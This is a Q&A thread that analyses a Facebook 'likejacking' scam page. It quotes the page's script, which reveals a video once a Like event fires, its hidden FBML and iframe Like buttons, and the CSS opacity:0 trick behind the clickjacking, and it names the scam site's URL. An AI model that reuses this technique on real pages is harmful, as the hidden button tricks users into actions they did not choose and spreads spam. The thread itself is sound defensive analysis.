# How does this FB malware work?

Tags: facebook, xfbml, malware

**WARNING: This link is NSFW (it is porn).**

> 1truc2dingue.com/3-une-br%C3%A9silienne-enleve-le-bas.html

This went around today, and a popular friend on FB clicked on it. I knew it was malware and he's a programmer so I went to work to figure out how it fooled him.

Here is what I've found. At the start of the page you'll find this:

```
<script type="text/javascript">
<!--
window.fbAsyncInit = function()
{
 FB.init({appId: '135200846551763', status: true, cookie: true, xfbml: true});
 FB.Event.subscribe('edge.create', function(href, widget) {
    document.getElementById("video").style.display= 'block';
    document.getElementById("preview").style.display= 'none';
 });
};
//-->
</script>
```

Nothing too secretive there. When the page is Liked (event stupidly called ["edge.create"](https://developers.facebook.com/docs/reference/javascript/FB.Event.subscribe/)) the preview goes away, and the video (initialized as *display:none* shows).

How then does one like the page when there is no obvious "Like!" button. This is the trick behind the script. I can see the script uses the deprecated FBML,

```
<fb:like id=f2 class=iframe href="http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html" layout="button_count" show_faces="false" width="480" style="margin-top:65px;margin-left:110px;"></fb:like>
```

And, the modern iFrame API,

```
<iframe id=f1 class=iframe src="http://www.facebook.com/plugins/like.php?href=http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html&amp;layout=button_count&amp;show_faces=false&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true"></iframe>
```

Comment: Correct term: ***NSFW***

Comment: What if you're not at work but you still don't want to view it? I disagree with your edit.

Comment: @EvanCarroll: If you don't want to view something that's not safe for work, don't view it. If an adult has trouble opening child-safe caps, they would ask a druggist for "no child-safe caps", even though no children are involved. The term "NSFW" warns people that something is not safe for work so that people who don't want to view things that are not safe for work, whether they're at work or not, will know not to click on them.

Comment: @Evan well, if you wouldn't show content of that link to your boss, it's NSFW even if you're out of your work

Comment: Let's at least make sure that the blasted thing doesn't get linked.

Answer (score 3):

This is called [ClickJacking](http://en.wikipedia.org/wiki/Clickjacking)

You just click on invisible "like" button (`.iframe` class)

```
.iframe {
    opacity: 0;
    filter: alpha(opacity=0);
}
```

Comment: I see it! `.iframe{opacity:0;filter:alpha(opacity=0)}` at the bottom. I thought it was some sort of deeper voodoo than that.. Is this legal? Will Facebook ban website caught with this method?

Comment: @Cole sorry for the Czech link, I didn't notice it and thanks for correcting me! :)

Comment: @Evan I'd say this isn't illegal but at least not  allowed from Facebook. Facebook will definitely ban these sites if someone notices it.

Comment: Erg, legal as in, permissible by the terms. I don't even see a way to report this to FB shy of marking it as spam to get it off your own timeline.

Comment: @Even well I don't feel it is worth reporting. You'd neet at least XXX users to report it, too. So no, it's not permissible by the terms